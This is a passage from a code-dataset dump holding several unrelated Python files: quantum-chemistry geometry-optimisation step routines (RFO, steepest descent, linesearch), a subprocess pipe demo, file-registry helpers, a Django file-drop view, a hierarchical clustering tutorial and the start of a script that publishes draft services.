logger.debug(\"\\tAll scaled RFO eigenvectors (rows).\\n\\n\" + print_mat_string(SRFOevects))\n\n # Use input rfo_root\n # If root-following is turned off, then take the eigenvector with the\n # rfo_root'th lowest eigvenvalue. If its the first iteration, then do the same.\n # In subsequent steps, overlaps will be checked.\n if not rfo_follow_root or len(oHistory.steps) < 2:\n\n # Determine root only once at beginning ?\n if alphaIter == 0:\n logger.debug(\"\\tChecking RFO solution %d.\" % (rfo_root + 1))\n\n rfo_root = find_rfo_root(rfo_root, SRFOevects, oMolsys, dim, dq)\n\n # Save initial root. 'Follow' during the RS-RFO iterations.\n rfo_follow_root = True\n\n else: # Do root following.\n # Find maximum overlap. Dot only within H block.\n dots = np.array(\n [v3d.dot(SRFOevects[i], last_iter_evect, dim) for i in range(dim)],\n float,\n )\n bestfit = np.argmax(dots)\n if bestfit != rfo_root:\n logger.info(\"\\tRoot-following has changed rfo_root value to %d.\" % (bestfit + 1))\n rfo_root = bestfit\n\n if alphaIter == 0:\n logger.info(\"\\tUsing RFO solution %d.\" % (rfo_root + 1))\n last_iter_evect[:] = SRFOevects[rfo_root][0:dim] # omit last column on right\n\n # Print only the lowest eigenvalues/eigenvectors\n if op.Params.print_lvl >= 2:\n logger.info(\"\\trfo_root is %d\" % (rfo_root + 1))\n for i in range(dim + 1):\n if SRFOevals[i] < -1e-6 or i < rfo_root:\n eigen_val_vec = \"\\n\\tScaled RFO eigenvalue %d:\\n\\t%15.10lf (or 2*%-15.10lf)\\n\" % (\n i + 1,\n SRFOevals[i],\n SRFOevals[i] / 2,\n )\n eigen_val_vec += \"\\n\\teigenvector:\\n\\t\"\n eigen_val_vec += print_array_string(SRFOevects[i])\n logger.info(eigen_val_vec)\n dq[:] = SRFOevects[rfo_root][0:dim] # omit last column\n\n # Project out redundancies in steps.\n # Added this projection in 2014; but doesn't seem to help, as f,H are already projected.\n # project_dq(dq);\n # zero steps for frozen coordinates?\n\n dqtdq = np.dot(dq, dq)\n # If alpha explodes, give up on iterative scheme\n if fabs(alpha) > op.Params.rsrfo_alpha_max:\n converged = False\n alphaIter = max_projected_rfo_iter - 1\n elif sqrt(dqtdq) < (trust + 1e-5):\n converged = True\n\n if alphaIter == 0 and not op.Params.simple_step_scaling:\n logger.debug(\"\\tDetermining step-restricting scale parameter for RS-RFO.\")\n\n if alphaIter == 0:\n rfo_step_report += (\n \"\\n\\n\\t Iter |step| alpha rfo_root\"\n + \"\\n\\t------------------------------------------------\"\n + \"\\n\\t%5d%12.5lf%14.5lf%12d\\n\" % (alphaIter + 1, sqrt(dqtdq), alpha, rfo_root + 1)\n )\n\n elif alphaIter > 0 and not op.Params.simple_step_scaling:\n rfo_step_report += \"\\t%5d%12.5lf%14.5lf%12d\\n\" % (\n alphaIter + 1,\n sqrt(dqtdq),\n alpha,\n rfo_root + 1,\n )\n\n # Find the analytical derivative, d(norm step squared) / d(alpha)\n # rfo_step_report += (\"\\t------------------------------------------------\\n\")\n\n Lambda = -1 * v3d.dot(fq, dq, dim)\n if op.Params.print_lvl >= 2:\n disp_forces = \"\\tDisplacement and Forces\\n\\n\"\n disp_forces += \"\\tDq:\" + print_array_string(dq, dim)\n disp_forces += \"\\tFq:\" + print_array_string(fq, dim)\n logger.info(disp_forces)\n logger.info(\"\\tLambda calculated by (dq^t).(-f) = %15.10lf\\n\" % Lambda)\n\n # Calculate derivative of step size wrt alpha.\n tval = 0\n for i in range(dim):\n tval += (pow(v3d.dot(Hevects[i], fq, dim), 2)) / (pow((Hevals[i] - Lambda * alpha), 3))\n\n analyticDerivative = 2 * Lambda / (1 + alpha * dqtdq) * tval\n if op.Params.print_lvl >= 2:\n rfo_step_report += \"\\t Analytic derivative d(norm)/d(alpha) = %15.10lf\\n\" % analyticDerivative\n # + \"\\n\\t------------------------------------------------\\n\")\n\n # Calculate new scaling alpha value.\n # Equation 20, Besalu and Bofill, Theor. Chem. Acc., 1998, 100:265-274\n alpha += 2 * (trust * sqrt(dqtdq) - dqtdq) / analyticDerivative\n\n # end alpha RS-RFO iterations\n logger.debug(rfo_step_report)\n return converged, dq\n\ndef find_rfo_root(rfo_root, SRFOevects, oMolsys, dim, dq):\n\n logger = logging.getLogger(__name__)\n\n for i in range(rfo_root, dim + 1):\n # Check symmetry of root.\n dq[:] = SRFOevects[i, 0:dim]\n if not op.Params.accept_symmetry_breaking:\n symm_rfo_step = is_dq_symmetric(oMolsys, dq)\n\n if not symm_rfo_step: # Root is assymmetric so reject it.\n logger.warning(\n \"\\tRejecting RFO root %d because it breaks \\\n the molecular point group.\"\n % (rfo_root + 1)\n )\n continue\n\n # Check normalizability of root.\n if fabs(SRFOevects[i][dim]) < 1.0e-10: # don't even try to divide\n logger.warning(\n \"\\tRejecting RFO root %d because normalization \\\n gives large value.\"\n % (rfo_root + 1)\n )\n continue\n tval = abs_max(SRFOevects[i] / SRFOevects[i][dim])\n if tval > op.Params.rfo_normalization_max: # matching test in code above\n logger.warning(\n \"\\tRejecting RFO root %d because normalization \\\n gives large value.\"\n % (rfo_root + 1)\n )\n continue\n rfo_root = i # This root is acceptable.\n break\n else:\n rfo_root = op.Params.rfo_root\n # no good root found, using the default\n\n return rfo_root\n\ndef dq_p_rfo(fq, H):\n logger = logging.getLogger(__name__)\n hdim = len(fq) # size of Hessian\n trust = op.Params.intrafrag_trust # maximum step size\n # rfo_follow_root = op.Params.rfo_follow_root # whether to follow root\n # rfo follow root is not currently implemented\n print_lvl = op.Params.print_lvl\n\n if print_lvl > 2:\n logger.info(\"\\tHessian matrix\\n\" + print_mat_string(H))\n\n # Diagonalize H (technically only have to semi-diagonalize)\n h_eig_values, h_eig_vectors = symm_mat_eig(H)\n\n if print_lvl > 2:\n logger.info(\"\\tEigenvalues of Hessian\\n\\n\\t\" + print_array_string(h_eig_values))\n logger.info(\"\\tEigenvectors of Hessian (rows)\\n\" + print_mat_string(h_eig_vectors))\n\n # Construct diagonalized Hessian with evals on diagonal\n\n hess_diag = np.diag(h_eig_values)\n\n if print_lvl > 2:\n logger.info(\"\\tH diagonal\\n\" + print_mat_string(hess_diag))\n\n logger.debug(\"\\tFor P-RFO, assuming rfo_root=1, maximizing along lowest eigenvalue of Hessian.\")\n logger.debug(\"\\tLarger values of rfo_root are not yet supported.\")\n\n rfo_root = 0\n \"\"\" TODO: use rfo_root to decide which eigenvectors are moved into the max/mu space.\n if not rfo_follow_root or len(oHistory.steps) < 2:\n rfo_root = op.Params.rfo_root\n printxopt(\"\\tMaximizing along %d lowest eigenvalue of Hessian.\\n\" % (rfo_root+1) )\n else:\n last_iter_evect = history[-1].Dq\n dots = np.array([v3d.dot(h_eig_vectors[i],last_iter_evect,hdim) for i in range(hdim)], float)\n rfo_root = np.argmax(dots)\n printxopt(\"\\tOverlaps with previous step checked for root-following.\\n\")\n printxopt(\"\\tMaximizing along %d lowest eigenvalue of Hessian.\\n\" % (rfo_root+1) )\n \"\"\"\n\n # number of degrees along which to maximize; assume 1 for now\n mu = 1\n\n logger.info(\"\\tInternal forces in au:\\n\\n\\t\" + print_array_string(fq))\n\n fqTransformed = np.dot(h_eig_vectors, fq) # gradient transformation\n logger.info(\"\\tInternal forces in au, in Hevect basis:\\n\\n\\t\" + print_array_string(fqTransformed))\n # Build RFO max\n # Lowest eigenvalue of hessian augmented with corresponding gradient components\n\n maximize_rfo = np.zeros((mu + 1, mu + 1))\n maximize_rfo[:mu, :mu] = hess_diag[:mu, :mu]\n maximize_rfo[:mu, -1] = maximize_rfo[-1, :mu] = -fqTransformed[:mu]\n\n if print_lvl > 2:\n logger.info(\"\\tRFO max\\n\" + print_mat_string(maximize_rfo))\n\n # Build RFO min\n # All remaining hessian eigenvalues augmented with gradient\n\n minimize_rfo = np.zeros((hdim - mu + 1, hdim - mu + 1))\n minimize_rfo[: hdim - mu, : hdim - mu] = hess_diag[mu:, mu:]\n minimize_rfo[: hdim - mu, -1] = minimize_rfo[-1, : hdim - mu] = -fqTransformed[mu:hdim]\n\n if print_lvl > 2:\n logger.info(\"\\tRFO min\\n\" + print_mat_string(minimize_rfo))\n\n RFOMaxEValues, RFOMaxEVectors = symm_mat_eig(maximize_rfo)\n RFOMinEValues, RFOMinEVectors = symm_mat_eig(minimize_rfo)\n\n logger.info(\"\\tRFO min eigenvalues:\\n\\n\\t\" + print_array_string(RFOMinEValues))\n logger.info(\"\\tRFO max eigenvalues:\\n\\n\\t\" + print_array_string(RFOMaxEValues))\n\n if print_lvl > 2:\n logger.info(\"\\tRFO min eigenvectors (rows) before normalization:\\n\" + print_mat_string(RFOMinEVectors))\n logger.info(\"\\tRFO max eigenvectors (rows) before normalization:\\n\" + print_mat_string(RFOMaxEVectors))\n\n # Normalize max and min eigenvectors\n for i in range(mu + 1):\n if abs(RFOMaxEVectors[i, mu]) > 1.0e-10:\n tval = abs(abs_max(RFOMaxEVectors[i, 0:mu]) / RFOMaxEVectors[i, mu])\n if fabs(tval) < op.Params.rfo_normalization_max:\n RFOMaxEVectors[i] /= RFOMaxEVectors[i, mu]\n if print_lvl > 2:\n logger.info(\"\\tRFO max eigenvectors (rows):\\n\" + print_mat_string(RFOMaxEVectors))\n\n for i in range(hdim - mu + 1):\n if abs(RFOMinEVectors[i][hdim - mu]) > 1.0e-10:\n tval = abs(abs_max(RFOMinEVectors[i, 0 : hdim - mu]) / RFOMinEVectors[i, hdim - mu])\n if fabs(tval) < op.Params.rfo_normalization_max:\n RFOMinEVectors[i] /= RFOMinEVectors[i, hdim - mu]\n if print_lvl > 2:\n logger.info(\"\\tRFO min eigenvectors (rows):\\n\" + print_mat_string(RFOMinEVectors))\n\n VectorP = RFOMaxEVectors[mu, 0:mu]\n VectorN = RFOMinEVectors[rfo_root, 0 : hdim - mu]\n logger.debug(\"\\tVector P\\n\\n\\t\" + print_array_string(VectorP))\n logger.debug(\"\\tVector N\\n\\n\\t\" + print_array_string(VectorN))\n\n # Combines the eignvectors from RFO max and min\n prfoe_vector = np.zeros(hdim)\n prfoe_vector[0 : len(VectorP)] = VectorP\n prfoe_vector[len(VectorP) :] = VectorN\n\n prfo_step = np.dot(h_eig_vectors.transpose(), prfoe_vector)\n\n if print_lvl > 1:\n logger.info(\"\\tRFO step in Hessian Eigenvector Basis\\n\\n\\t\" + print_array_string(prfoe_vector))\n logger.info(\"\\tRFO step in original Basis\\n\\n\\t\" + print_array_string(prfo_step))\n\n dq = prfo_step\n\n # if not converged or op.Params.simple_step_scaling:\n apply_intrafrag_step_scaling(dq)\n\n # Get norm |dq|, unit vector, gradient and hessian in step direction\n # TODO double check Hevects[i] here instead of H ? as for NR\n rfo_dqnorm = sqrt(np.dot(dq, dq))\n logger.info(\"\\tNorm of target step-size %15.10f\" % rfo_dqnorm)\n rfo_u = dq / rfo_dqnorm\n rfo_g = -1 * np.dot(fq, rfo_u)\n rfo_h = np.dot(rfo_u, np.dot(H, rfo_u))\n DEprojected = de_projected(\"RFO\", rfo_dqnorm, rfo_g, rfo_h)\n if op.Params.print_lvl > 1:\n logger.info(\"\\t|RFO target step| : %15.10f\" % rfo_dqnorm)\n logger.info(\"\\tRFO gradient : %15.10f\" % rfo_g)\n logger.info(\"\\tRFO hessian : %15.10f\" % rfo_h)\n logger.debug(\"\\tProjected Delta(E) : %15.10f\" % DEprojected)\n\n return DEprojected, dq, rfo_u, rfo_g, rfo_h\n\n\ndef dq_sd(fq):\n \"\"\"Take a step using steepest descent method\n\n Parameters\n ----------\n fq : ndarray\n forces in internal coordinates\n \"\"\"\n\n logger = logging.getLogger(__name__)\n logger.info(\"\\tTaking SD optimization step.\")\n dim = len(fq)\n sd_h = op.Params.sd_hessian # default value\n\n if len(oHistory.steps) > 1:\n previous_forces = oHistory.steps[-2].forces\n previous_dq = oHistory.steps[-2].Dq\n\n # Compute overlap of previous forces with current forces.\n previous_forces_u = previous_forces / np.linalg.norm(previous_forces)\n forces_u = fq / np.linalg.norm(fq)\n overlap = np.dot(previous_forces_u, forces_u)\n logger.debug(\"\\tOverlap of current forces with previous forces %8.4lf\" % overlap)\n previous_dq_norm = np.linalg.norm(previous_dq)\n\n if overlap > 0.50:\n # Magnitude of current force\n fq_norm = np.linalg.norm(fq)\n # Magnitude of previous force in step direction\n previous_forces_norm = v3d.dot(previous_forces, fq, dim) / fq_norm\n sd_h = (previous_forces_norm - fq_norm) / previous_dq_norm\n\n logger.info(\"\\tEstimate of Hessian along step: %10.5e\" % sd_h)\n dq = fq / sd_h\n\n apply_intrafrag_step_scaling(dq)\n\n sd_dqnorm = np.linalg.norm(dq)\n logger.info(\"\\tNorm of target step-size %10.5f\" % sd_dqnorm)\n\n # unit vector in step direction\n sd_u = dq / np.linalg.norm(dq)\n sd_g = -1.0 * sd_dqnorm\n\n DEprojected = de_projected(\"NR\", sd_dqnorm, sd_g, sd_h)\n logger.debug(\"\\tProjected energy change by quadratic approximation: %20.5lf\" % DEprojected)\n\n return DEprojected, dq, sd_u, sd_g, sd_h\n\n\ndef dq_backstep(o_molsys):\n \"\"\"takes a partial step backwards\n\n Notes\n -----\n Take partial backward step. Update current step in history.\n Divide the last step size by 1/2 and displace from old geometry.\n HISTORY contains:\n consecutiveBacksteps : increase by 1\n HISTORY.STEP contains:\n No change to these:\n forces, geom, E, followedUnitVector, oneDgradient, oneDhessian\n Update these:\n Dq - cut in half\n projectedDE - recompute\n\n \"\"\"\n\n logger = logging.getLogger(__name__)\n logger.warning(\"\\tRe-doing last optimization step - smaller this time.\\n\")\n\n # Calling function shouldn't let this happen; this is a check for developer\n if len(oHistory.steps) < 2:\n raise OptError(\"Backstep called, but no history is available.\")\n\n # Erase last, partial step data for current step.\n del oHistory.steps[-1]\n\n # Get data from previous step.\n fq = oHistory.steps[-1].forces\n dq = oHistory.steps[-1].Dq\n oneDgradient = oHistory.steps[-1].oneDgradient\n oneDhessian = oHistory.steps[-1].oneDhessian\n # Copy old geometry so displace doesn't change history\n geom = oHistory.steps[-1].geom.copy()\n\n # Compute new Dq and energy step projection.\n dq /= 2\n dqNorm = np.linalg.norm(dq)\n logger.info(\"\\tNorm of target step-size %10.5f\" % dqNorm)\n\n # Compute new Delta(E) projection.\n if op.Params.step_type == \"RFO\":\n DEprojected = de_projected(\"RFO\", dqNorm, oneDgradient, oneDhessian)\n else:\n DEprojected = de_projected(\"NR\", dqNorm, oneDgradient, oneDhessian)\n logger.debug(\"\\tProjected energy change : %20.5lf\" % DEprojected)\n\n o_molsys.geom = geom # uses setter; writes into all fragments\n dq_achieved = displace_molsys(o_molsys, dq, fq)\n\n dqNormActual = np.linalg.norm(dq_achieved)\n logger.info(\"\\tNorm of achieved step-size %15.10f\" % dqNormActual)\n\n oHistory.steps[-1].projectedDE = DEprojected\n oHistory.steps[-1].Dq[:] = dq_achieved\n\n return dq_achieved\n\n\ndef dq_linesearch(o_molsys, E, fq, H, computer):\n \"\"\"performs linesearch in direction of gradient\n\n Parameters\n ----------\n o_molsys : object\n optking molecular system\n E : double\n energy\n fq : ndarray\n forces in internal coordinates\n H : ndarray\n hessian in internal coordinates\n computer : computeWrapper\n \"\"\"\n\n logger = logging.getLogger(__name__)\n s = op.Params.linesearch_step\n\n if len(oHistory.steps) > 1:\n s = norm(oHistory.steps[-2].Dq) / 2\n logger.info(\"\\tModifying linesearch s to %10.6f\" % s)\n\n logger.info(\"\\n\\tTaking LINESEARCH optimization step.\")\n fq_unit = fq / sqrt(np.dot(fq, fq))\n logger.info(\"\\tUnit vector in gradient direction.\\n\\n\\t\" + print_array_string(fq_unit) + \"\\n\")\n Ea = E\n geomA = o_molsys.geom # get copy of original geometry\n Eb = Ec = 0\n bounded = False\n ls_iter = 0\n stepScale = 2\n\n # Iterate until we find 3 points bounding minimum.\n while ls_iter < 10 and not bounded:\n ls_iter += 1\n\n if Eb == 0:\n logger.debug(\"\\n\\tStepping along forces distance %10.5f\" % s)\n dq = s * fq_unit\n dq_achieved = displace_molsys(o_molsys, dq, fq)\n xyz = o_molsys.geom\n logger.debug(\"\\tComputing energy at this point now.\")\n Eb = computer.compute(xyz, driver=\"energy\", return_full=False)\n\n o_molsys.geom = geomA # reset geometry to point A\n\n if Ec == 0:\n logger.debug(\"\\n\\tStepping along forces distance %10.5f\" % (stepScale * s))\n dq = (stepScale * s) * fq_unit\n dq_achieved = displace_molsys(o_molsys, dq, fq)\n xyz = o_molsys.geom\n logger.debug(\"\\tComputing energy at this point now.\")\n Ec = computer.compute(xyz, driver=\"energy\", return_full=False)\n o_molsys.geom = geomA # reset geometry to point A\n\n logger.info(\"\\n\\tCurrent linesearch bounds.\\n\")\n logger.info(\"\\t s=%7.5f, Ea=%17.12f\" % (0, Ea))\n logger.info(\"\\t s=%7.5f, Eb=%17.12f\" % (s, Eb))\n logger.info(\"\\t s=%7.5f, Ec=%17.12f\\n\" % (stepScale * s, Ec))\n\n if Eb < Ea and Eb < Ec:\n # second point is lowest do projection\n logger.debug(\"\\tMiddle point is lowest energy. Good. Projecting minimum.\")\n Sa = 0.0\n Sb = s\n Sc = stepScale * s\n\n A = np.zeros((2, 2))\n A[0, 0] = Sc * Sc - Sb * Sb\n A[0, 1] = Sc - Sb\n A[1, 0] = Sb * Sb - Sa * Sa\n A[1, 1] = Sb - Sa\n B = np.zeros(2)\n B[0] = Ec - Eb\n B[1] = Eb - Ea\n x = np.linalg.solve(A, B)\n Xmin = -x[1] / (2 * x[0])\n\n logger.debug(\"\\tParabolic fit ax^2 + bx + c along gradient.\")\n logger.debug(\"\\t *a = %15.10f\" % x[0])\n logger.debug(\"\\t *b = %15.10f\" % x[1])\n logger.debug(\"\\t *c = %15.10f\" % Ea)\n Emin_projected = x[0] * Xmin * Xmin + x[1] * Xmin + Ea\n dq = Xmin * fq_unit\n logger.info(\"\\tProjected step size to minimum is %12.6f\" % Xmin)\n dq_achieved = displace_molsys(o_molsys, dq, fq)\n xyz = o_molsys.geom\n logger.debug(\"\\tComputing energy at projected point.\")\n Emin = computer.compute(xyz, driver=\"energy\", return_full=False)\n logger.info(\"\\tProjected energy along line: %15.10f\" % Emin_projected)\n logger.info(\"\\t Actual energy along line: %15.10f\" % Emin)\n\n bounded = True\n\n elif Ec < Eb and Ec < Ea:\n # unbounded. increase step size\n logger.debug(\"\\tSearching with larger step beyond 3rd point.\")\n s *= stepScale\n Eb = Ec\n Ec = 0\n\n else:\n logger.debug(\"\\tSearching with smaller step between first 2 points.\")\n s *= 0.5\n Ec = Eb\n Eb = 0\n\n # get norm |q| and unit vector in the step direction\n ls_dqnorm = np.linalg.norm(dq_achieved)\n ls_u = dq_achieved / ls_dqnorm\n\n # get gradient and hessian in step direction\n ls_g = -1 * np.dot(fq, ls_u) # should be unchanged\n ls_h = np.dot(ls_u, np.dot(H, ls_u))\n\n if op.Params.print_lvl > 1:\n logger.info(\"\\n\\\\t|target step|: %15.10f\" % ls_dqnorm)\n logger.info(\"\\tLS_gradient : %15.10f\" % ls_g)\n logger.info(\"\\tLS_hessian : %15.10f\" % ls_h)\n\n DEprojected = de_projected(\"NR\", ls_dqnorm, ls_g, ls_h)\n logger.debug(\"\\tProjected quadratic energy change using full Hessian: %15.10f\\n\" % DEprojected)\n\n oHistory.nuclear_repulsion_energy = computer.trajectory[-1][\"properties\"][\"nuclear_repulsion_energy\"]\n\n return DEprojected, dq_achieved, ls_u, ls_g, ls_h\n\n # Scale fq into aJ for printing\n # fq_aJ = o_molsys.q_show_forces(fq)\n # displace_molsys(o_molsys, dq, fq_aJ)\n","sub_path":"optking/stepAlgorithms.py","file_name":"stepAlgorithms.py","file_ext":"py","file_size_in_byte":31594,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"140001261","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\"\"\"\n communicate() 方法读取所有输出,返回之前要等待子进程退出\n\n 下面的例子中,在程序运行时从 Popen 实例使用的各个管道句柄增量地进行读写\n\"\"\"\n\nimport io\nimport subprocess\n\nprint('One line at a time:')\n\nproc = subprocess.Popen(\n 'python3 repeater.py',\n shell=True,\n stdin=subprocess.PIPE,\n stdout=subprocess.PIPE,\n)\n\nstdin = io.TextIOWrapper(\n proc.stdin,\n encoding='utf-8',\n line_buffering=True, # send data on newline\n)\n\nstdout = io.TextIOWrapper(\n proc.stdout,\n encoding='utf-8',\n)\n\n# 写一行读一行\nfor i in range(5):\n line = '{}\\n'.format(i)\n stdin.write(line)\n output = stdout.readline()\n print(output.rstrip())\n\nremainder = proc.communicate()[0].decode('utf-8')\n\nprint()\n\nprint('remainder:', remainder)\n\nprint()\n\nprint('All output at once:')\n\nproc = subprocess.Popen(\n 'python3 repeater.py',\n shell=True,\n stdin=subprocess.PIPE,\n stdout=subprocess.PIPE,\n)\n\nstdin = io.TextIOWrapper(\n proc.stdin,\n encoding='utf-8',\n)\n\n# 全部写完并调用 communicate() 一次性读取全部输出\nfor i in range(5):\n line = '{}\\n'.format(i)\n stdin.write(line)\nstdin.flush()\n\noutput = proc.communicate()[0].decode('utf-8')\n\nprint(output)\n\n# Result :\n\n# One line at a time:\n# repeater.py: starting\n# 0\n# 1\n# 2\n# 3\n# 4\n# repeater.py: exiting\n#\n# remainder:\n#\n# All output at once:\n# repeater.py: starting\n# repeater.py: exiting\n# 0\n# 1\n# 2\n# 3\n# 4\n","sub_path":"concurrent/subprocess/interact_with_another_command/interaction.py","file_name":"interaction.py","file_ext":"py","file_size_in_byte":1511,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"107775198","text":"from ex115 import *\n\n\ndef existearq(nome):\n try:\n a = open(nome, 'rt')\n a.close()\n except FileNotFoundError:\n return False\n else:\n return True\n\n\ndef criararquivo(nome):\n try:\n a = open(nome, 'wt+')\n a.close()\n except:\n print('Ouve um erro na criação do arquivo!')\n else:\n print('Arquivo .txt criado com sucesso!')\n\n\ndef lerarquivo(nome):\n try:\n a = open(nome, 'rt')\n except:\n print('Erro ao tentar ler o arquivo')\n else:\n mensagem('Pessoas cadastradas')\n for linha in a:\n dado = linha.split(';')\n dado[1] = dado[1].replace('\\n', '')\n print(f'{dado[0]:<38}{dado[1]:>5} anos')\n finally:\n a.close()\n\n\ndef cadastrar(arq, nome='Desconhecido', idade=0):\n try:\n a = open(arq, 'at')\n except:\n print('Houve um erro na abertura do arquivo')\n else:\n try:\n a.write(f'{nome};{idade}\\n')\n except:\n print('Houve um erro na escritura do dados')\n else:\n print(f'Novo registro de {nome} adicionado')\n a.close()","sub_path":"arquivo/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1136,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"384494025","text":"from datetime import datetime,timedelta\n\nfrom django.shortcuts import render, redirect, get_object_or_404\nfrom django.views import generic\nfrom django.http import HttpResponse, Http404\nfrom django.db.models import Q,F\nfrom ipware.ip import get_ip\n\nfrom filedrop.forms import DropFileForm\nfrom filedrop.models import DropFile\n\ndef get_fresh_drop_or_404(pk):\n drop = get_object_or_404(DropFile, id=pk)\n if drop.expire_time > 0:\n td = timedelta(seconds = drop.expire_time)\n if drop.created_at + td <= datetime.now(drop.created_at.tzinfo):\n raise Http404\n return drop\n\ndef index(request):\n form = DropFileForm()\n if request.method == 'POST':\n form = DropFileForm(request.POST, request.FILES)\n if form.is_valid():\n drop = form.save(commit=False)\n drop.uploaded_ip = get_ip(request)\n drop.save()\n return redirect(drop)\n publicdrops = DropFile.objects.order_by('-created_at').filter(is_public=True).extra(where=['expire_time < 0 OR created_at + interval \\'1 second\\' * expire_time > now()'])\n return render(request, 'filedrop/index.html',\n {\n 'dropform': form,\n 'publicdrops': publicdrops[:10]\n })\n\ndef drop_detail(request, pk):\n drop = get_fresh_drop_or_404(pk=pk)\n return render(request, 'filedrop/details.html',\n {\n 'dropfile': drop\n })\n\n","sub_path":"filedrop/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1433,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"116317654","text":"#!/home/kevinml/anaconda3/bin/python3.7\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Mar 27 13:15:02 2019\n\n@author: juangabriel and Kevin Meza\n\"\"\"\n\n# Clustering Jerárquico\n\n# =======================================================================================================\n# PASOS\n#\n# Hay 2 tipos de agrupaciones jerarquicos: \"Aglomerativo\" (de abajo hacia arriba) y \"Divisitivo\" (de arriba\n# hacia abajo).\n#\n# Clustering Jerárquico Aglomerativo\n# Junta 1 por 1 los elementos similares para formar grupos.\n#\n# PASOS\n# 1.- Hacer que cada punto sea un cluster.\n# 2.- Se eligen los 2 puntos mas cercanos y se juntan en un unico cluster.\n# 3.- Se eligen los 2 clusters mas cercanos y se juntan en un unico cluster.\n# 4.- Repetir el paso 3 hasta tener un unico cluster.\n#\n# Para definir los puntos o clusters mas cercanos, se hace uso de Distancias Euclidianas generalmente;\n# tambien se puede hacer uso de Distancia Manhattan, Distancia Minkowski, etc.\n#\n# Distancia entre Clusters\n# ###########################\n# OPCION 1: Se cacula a partir de los puntos mas cercanos entre los clusters.\n# OPCION 2: Se cacula a partir de los puntos mas lejanos entre los clusters.\n# OPCION 3: Se cacula la distancia media.\n# \t\t\tSe calculan todas las combinaciones de distancias entre los puntos de un cluster y el otro.\n# OPCION 4: Se cacula la distancia entre los baricentros de los clusters.\n#\n# Se representan de forma visual con un DENDOGRAMA\n# Una vez con el dendograma, para obtener el numero de cluster en los que se dividen los datos, se tiene\n# que elegir un umbral de distancia Euclidiana (que representa disimilaridad) para cortar el Dendograma.\n# Dependiendo del umbral que se elija, es el munero de clusters resultantes.\n#\n# Numero Optimo de Clusters\n# ############################\n# Una REGLA es que la linea que corta el dendograma debe pasar por la linea vertical mas alta, que\n# representa la disimilaridad de un cluster, con respecto al anterior. CON LA CONDICION, de que esta linea\n# vertical NO cruce ningunarecta horizontal.\n# El numero de clusters sera la cantidad de lineas verticales que corte la linea horizontal.\n#\n# Mas Dimensiones\n# Se necesita aplcar una tecnica de reduccion de Dimensionalidad y luego aplicar el metodo. \n#\n# =======================================================================================================\n\n# Importar las librerías\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\n################################################\n### IMPORTAR EL DATA SET ###\n################################################\n\ndataset = pd.read_csv(\"Mall_Customers.csv\")\nX = dataset.iloc[:, [3, 4]].values\n\n#####################################################\n### NUMERO OPTIMO DE CLUSTERS ###\n#####################################################\n\n# Utilizar el dendrograma para encontrar el número óptimo de clusters\n\n# Importamos la libreria para generar el dendograma\nimport scipy.cluster.hierarchy as sch\n# El parametro \"method\", hace referencia al metodo para encontrar los clusters,\n# la opcion \"ward\", minimiza la varianza entre los puntos de cada cluster.\ndendrogram = sch.dendrogram(sch.linkage(X, method=\"ward\"))\nplt.title(\"Dendrograma\")\nplt.xlabel(\"Clientes\")\nplt.ylabel(\"Distancia Euclídea\")\nplt.show()\n\n#################################################################\n# AJUSTAR EL CLUSTERING JERARQUICO AL DATASET #\n#################################################################\n\n# Importamos la libreria para generar los clusters.\n# https://scikit-learn.org/stable/modules/generated/sklearn.cluster.AgglomerativeClustering.html\nfrom sklearn.cluster import AgglomerativeClustering\n# El parametro \"affinity\", hace referencia al tipo de distancia que se va a utilizar\n# El parametro \"linkage\", hace referencia al metodo con el que se unen los clusters.\n# Dado que el dendograma se uso el metodo de \"ward\" se usara tambien, otras opciones son la\n# distancia minima o la distancia media.\nhc = AgglomerativeClustering(\n n_clusters=5, affinity=\"euclidean\", linkage=\"ward\")\ny_hc = hc.fit_predict(X)\n\n####################################\n# Visualización de los clusters #\n####################################\n\nplt.scatter(X[y_hc == 0, 0], X[y_hc == 0, 1], s=100, c=\"red\", label=\"Cautos\")\nplt.scatter(X[y_hc == 1, 0], X[y_hc == 1, 1],\n s=100, c=\"blue\", label=\"Estandard\")\nplt.scatter(X[y_hc == 2, 0], X[y_hc == 2, 1],\n s=100, c=\"green\", label=\"Objetivo\")\nplt.scatter(X[y_hc == 3, 0], X[y_hc == 3, 1],\n s=100, c=\"cyan\", label=\"Descuidados\")\nplt.scatter(X[y_hc == 4, 0], X[y_hc == 4, 1], s=100,\n c=\"magenta\", label=\"Conservadores\")\nplt.title(\"Cluster de clientes\")\nplt.xlabel(\"Ingresos anuales (en miles de $)\")\nplt.ylabel(\"Puntuación de Gastos (1-100)\")\nplt.legend()\nplt.show()\n","sub_path":"datasets/Part 4 - Clustering/Section 25 - Hierarchical Clustering/hc.py","file_name":"hc.py","file_ext":"py","file_size_in_byte":4848,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"614043805","text":"#!/usr/bin/env python\n\"\"\"\n\nFor a DOS-style framework (with no documents to migrate) this will:\n 1. Find all suppliers awarded onto the framework\n 2. Find all their submitted draft services on the framework\n 3. Migrate these from drafts to \"real\" services\n\nUsage:\n scripts/publish-dos-draft-services.py [--dry-run]\n\"\"\"\nimport sys\nsys.path.insert(0, '.')\n\nfrom docopt import docopt\nfrom dmscripts.helpers.auth_helpers import get_auth_token\nfrom dmscripts.helpers.framework_helpers import find_suppliers_on_framework, get_submitted_drafts\nfrom dmapiclient import DataAPIClient\nfrom dmutils.env_helpers import get_api_endpoint_from_stage\n\n\ndef make_draft_service_live(client, draft, dry_run):\n print(u\" > Migrating draft {} - {}\".format(draft['id'], draft['lot']))\n if dry_run:\n print(\" > no-op\")\n else:\n try:\n services = client.publish_draft_service(draft['id'], \"publish dos draft services script\")\n service_id = services['services']['id']\n print(u\" > draft service published - new service ID {}\".format(service_id))\n except Exception as e:\n if e.message == \"Cannot re-publish a submitted service\":\n print(u\" > Draft {} already published\".format(draft['id']))\n 